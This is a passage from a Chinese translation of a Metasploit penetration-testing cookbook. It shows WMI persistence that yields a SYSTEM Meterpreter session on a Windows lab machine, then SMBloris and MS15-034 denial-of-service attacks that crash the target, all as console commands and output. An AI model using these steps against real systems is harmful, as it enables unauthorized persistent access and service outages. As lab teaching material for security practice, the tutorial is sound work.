  17. [*] Migration completed successfully.
  18. meterpreter >
  19. 复制代码

然后再次攻击

  1. meterpreter > background
  2. [*] Backgrounding session 1...
  3. msf5 exploit(windows/local/wmi_persistence) > exploit
  4. [*] Installing Persistence...
  5. [+] - Bytes remaining: 12560
  6. [+] - Bytes remaining: 4560
  7. [+] Payload successfully staged.
  8. [+] Persistence installed! Call a shell using "smbclient \\\\192.168.177.144\\C$ -U Administrator <arbitrary password>"
  9. [*] Clean up Meterpreter RC file: /root/.msf4/logs/wmi_persistence/192.168.177.144_20190428.2114/192.168.177.144_20190428.2114.rc
  10. msf5 exploit(windows/local/wmi_persistence) >
  11. 复制代码

注销目标机登录,然后重新登录,msfconsole这边就会接收到回连的会话

  1. [*] Meterpreter session 2 opened (192.168.177.143:4433 -> 192.168.177.144:49437) at 2019-04-28 12:27:54 +0800
  2. msf5 exploit(multi/handler) > sessions -i 2
  3. [*] Starting interaction with 2...
  4. meterpreter > getuid
  5. Server username: NT AUTHORITY\SYSTEM
  6. meterpreter > sysinfo
  7. Computer : METASPLOITABLE3
  8. OS : Windows 2008 R2 (Build 7601, Service Pack 1).
  9. Architecture : x64
  10. System Language : en_US
  11. Domain : WORKGROUP
  12. Logged On Users : 2
  13. Meterpreter : x86/windows
  14. meterpreter >
  15. 复制代码

9、拒绝服务攻击

拒绝服务攻击通常是通过向目标机请求大量的资源或利用漏洞,造成拒绝服务攻击,消耗目标机器性能,拒绝服务攻击会导致合法用户无法访问计算机服务或资源,甚至可能会导致服务或操作系统崩溃。

准备工作

SMBloris是一个已经存在了20 年的 Windows SMB 漏洞,此漏洞可导致拒绝服务攻击( DoS ) , 使得大规模服务器瘫痪。影响所有版本的 SMB 协议以及所有Windows 2000 之后的系统版本。

怎么做

1、在进行SMBloris拒绝服务攻击之前,要先设置攻击机的最大连接数。

  1. root@osboxes:~# ulimit -n 65535
  2. root@osboxes:~# ulimit -n
  3. 65535
  4. root@osboxes:~#
  5. 复制代码

2、然后使用smb_loris模块来攻击目标机机器

  1. msf5 auxiliary(dos/smb/smb_loris) > set RHOST 192.168.177.144
  2. RHOST => 192.168.177.144
  3. msf5 auxiliary(dos/smb/smb_loris) > run
  4. [*] Starting server...
  5. [*] 192.168.177.144:445 - 100 socket(s) open
  6. [*] 192.168.177.144:445 - 200 socket(s) open
  7. [*] 192.168.177.144:445 - 300 socket(s) open
  8. [*] 192.168.177.144:445 - 400 socket(s) open
  9. [*] 192.168.177.144:445 - 500 socket(s) open
  10. [*] 192.168.177.144:445 - 600 socket(s) open
  11. [*] 192.168.177.144:445 - 700 socket(s) open
  12. [*] 192.168.177.144:445 - 800 socket(s) open
  13. [*] 192.168.177.144:445 - 900 socket(s) open
  14. [*] 192.168.177.144:445 - 1000 socket(s) open
  15. [!] 192.168.177.144:445 - At open socket limit with 1017 sockets open. Try increasing you system limits.
  16. [*] 192.168.177.144:445 - 1017 socket(s) open
  17. [*] 192.168.177.144:445 - Holding steady at 1017 socket(s) open
  18. 复制代码

3、查看目标机器,我们可以看到由于攻击者发送了大量的SMB请求消耗了目标机的大量内存。每一个 NBSS 连接可以申请分配 128 KB 内存空间,在建立大量连接的情况下可以耗尽内存,达到拒绝服务的效果。

另一个可怕的DoS攻击是MS15-034HTTP协议栈请求处理拒绝服务。

如果Microsoft Windows 7, Windows 8, Windows Server 2008, or Windows Server 2012机器正在运行了存在MS15-034漏洞的IIS服务,那么可以利用这个漏洞导致目标服务器崩溃。

  1. msf5 > use auxiliary/dos/http/ms15_034_ulonglongadd
  2. msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 192.168.177.144
  3. RHOSTS => 192.168.177.144
  4. msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > exploit
  5. [*] DOS request sent
  6. [*] Scanned 1 of 1 hosts (100% complete)
  7. [*] Auxiliary module execution completed
  8. msf5 auxiliary(dos/http/ms15_034_ulonglongadd) >
  9. 复制代码

可以看到,目标死机蓝屏了。

相关实验在线学习

Metasploit攻击linux实例

Metasploit攻击winserver2008实例

第四章 Meterpreter (预告)

在本章中,我们将学习以下内容:

1、了解Meterpreter核心命令

2、了解Meterpreter文件系统命令

3、了解Meterpreter网络命令

4、了解Meterpreter系统命令

5、与目标建立多重通信信道

6、Meterpreter反取证

7、屏幕和键盘监听

8、使用 scraper Merterpreter脚本

9、使用 winenum 枚举系统信息

10、自动化脚本

11、Meterpreter资源脚本

12、Meterpreter超时控制

13、Meterpreter休眠控制

14、Meterpreter传输

15、注册表操作

16、加载框架插件

17、API和Mixins

18、Railgun——将Ruby转换为武器

19、向Railgun中添加DLL和函数定义

20、劫持远程VNC

21、开启远程桌面

说明

原书:《Metasploit Penetration Testing Cookbook - Third Edition》

www.packtpub.com/networking-…

本文由泓源视野翻译,转载请注明来源。

 

真实环境,在线实操学网络安全 ; 实验内容涵盖:系统安全,软件安全,网络安全,Web安全,移动安全,CTF,取证分析,渗透测试,网安意识教育等。

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud

您是第8237455 位访客, 您的IP是:[3.235.105.97]